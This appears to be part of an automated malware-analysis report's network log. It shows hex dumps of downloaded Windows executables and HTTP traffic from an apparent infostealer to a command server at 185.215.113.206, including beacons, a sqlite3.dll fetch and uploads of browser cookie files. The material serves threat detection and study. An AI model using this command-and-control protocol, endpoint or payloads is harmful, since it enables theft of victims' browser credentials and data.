20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 79 77 65 74 74 69 6e 00 e0 19 00 00 90 2f 00 00 d2 19 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6e 6f 6f 6a 74 6c 6b 00 10 00 00 00 70 49 00 00 06 00 00 00 2c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 49 00 00 22 00 00 00 32 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 08 Dec 2024 18:53:44 GMTContent-Type: application/octet-streamContent-Length: 1806336Last-Modified: Sun, 08 Dec 2024 18:43:37 GMTConnection: keep-aliveETag: "6755e8d9-1b9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 00 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 69 00 00 04 00 00 9f 51 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6b 70 73 61 6a 6a 68 00 f0 19 00 00 00 4f 00 00 ea 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 76 73 6b 61 64 79 76 00 10 00 00 00 f0 68 00 00 06 00 00 00 68 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 69 00 00 22 00 00 00 6e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 08 Dec 2024 18:53:53 GMTContent-Type: application/octet-streamContent-Length: 971264Last-Modified: Sun, 08 Dec 2024 18:41:42 GMTConnection: keep-aliveETag: "6755e866-ed200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5e e8 55 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 22 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 76 e0 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 18 66 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 66 01 00 00 40 0d 00 00 68 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 5c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 08 Dec 2024 18:54:01 GMTContent-Type: application/octet-streamContent-Length: 2836992Last-Modified: Sun, 08 Dec 2024 18:42:09 GMTConnection: keep-aliveETag: "6755e881-2b4a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 bd c6 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 76 62 64 6a 69 69 72 00 00 2b 00 00 a0 00 00 00 e8 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6c 76 62 6d 64 69 68 00 20 00 00 00 a0 2b 00 00 06 00 00 00 22 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 28 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFIJJEGHDAEBGCAKJKFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 36 36 42 33 32 30 39 44 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 2d 2d 0d 0a Data Ascii: ------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="hwid"3266B3209D0F807656615------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="build"stok------BKFIJJEGHDAEBGCAKJKF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="message"browsers------EGDGIIJJECFIDHJJKKFC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="message"plugins------DBKFHCFBGIIJKFHJDHDH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="message"fplugins------HIDAKFIJJKJJJKEBKJEH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCGHost: 185.215.113.206Content-Length: 8279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKFHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 2d 2d 0d 0a Data Ascii: ------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------JEGDGIIJJECFIDHJJKKF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHJKJEBGHJJKEBGIECHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 2d 2d 0d 0a Data Ascii: ------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="file"------KJEHJKJEBGHJJKEBGIEC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file"------GIECFIEGDBKJKFIDHIEC--
